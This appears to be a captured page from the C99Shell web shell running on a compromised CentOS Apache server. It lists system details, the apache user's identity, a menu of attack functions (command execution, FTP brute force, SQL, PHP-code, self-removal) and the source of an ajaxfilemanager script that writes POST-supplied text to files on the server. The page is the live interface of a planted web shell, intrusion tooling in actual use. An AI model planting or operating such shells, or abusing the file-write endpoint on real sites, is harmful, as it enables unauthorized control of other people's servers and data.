!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/admin/newsletter/newsletter_i/lib/tinymce/plugins/ajaxfilemanager/   drwxr-xr-x
Free 9.17 GB of 93.48 GB (9.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ajax_save_text.php (1.81 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
/**
     * ajax save name
     * @author Logan Cai (cailongqun [at] yahoo [dot] com [dot] cn)
     * @link www.phpletter.com
     * @since 22/May/2007
     *
     */
    
require_once(dirname(__FILE__) . DIRECTORY_SEPARATOR "inc" DIRECTORY_SEPARATOR "config.php");
    
$error '';
    
$path addTrailingSlash(backslashToSlash($_POST['folder'])) . $_POST['name'];
    if(
CONFIG_SYS_VIEW_ONLY || !CONFIG_OPTIONS_EDITABLE)
    {
        
$error SYS_DISABLED;
    }
    elseif(isset(
$_POST['save_as_request']))
    {        
        if(!
preg_match('/^[a-zA-Z0-9_\-.]+$/'$_POST['name']))
        {
            
$error TXT_SAVE_AS_ERR_NAME_INVALID;
        }elseif(
array_search(strtolower(getFileExt($_POST['name'])), getValidTextEditorExts()) === false)
        {
            
$error TXT_DISALLOWED_EXT;
        }elseif(!
isUnderRoot($_POST['folder']))
        {
            
$error ERR_FOLDER_PATH_NOT_ALLOWED;
        }
        else
        {
            
            if(!empty(
$_POST['save_as_request']))
            {
//save as request
                
if(file_exists($path))
                {
                    
$error TXT_FILE_EXIST;
                }else 
                {
                    if((
$fp = @fopen($path'w+')) !== false)
                    {
                        if(@
fwrite($fp$_POST['text']))
                        {
                            @
fclose($fp);
                        }else 
                        {
                            
$error TXT_CONTENT_WRITE_FAILED;
                        }
                    }else 
                    {
                        
$error TXT_CREATE_FAILED;
                    }                    
                }

                
            }else 
            {
                if(!
file_exists($path))
                {
                    
$error TXT_FILE_NOT_EXIST;
                }else 
                {
                    if((
$fp = @fopen($path'w')) !== false)
                    {
                        if(@
fwrite($fp$_POST['text']))
                        {
                            @
fclose($fp);
                        }else 
                        {
                            
$error TXT_CONTENT_UPDATE_FAILED;
                        }
                    }else 
                    {
                        
$error TXT_FILE_OPEN_FAILED;
                    }                        
                }
            }
            
        }

    }else 
    {
        
$error TXT_UNKNOWN_REQUEST;
    }
        echo 
"{";
        echo 
"error:'" $error "',\n";
        echo  
"path:'" $path "'";
        echo 
"}";
    
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0045 ]--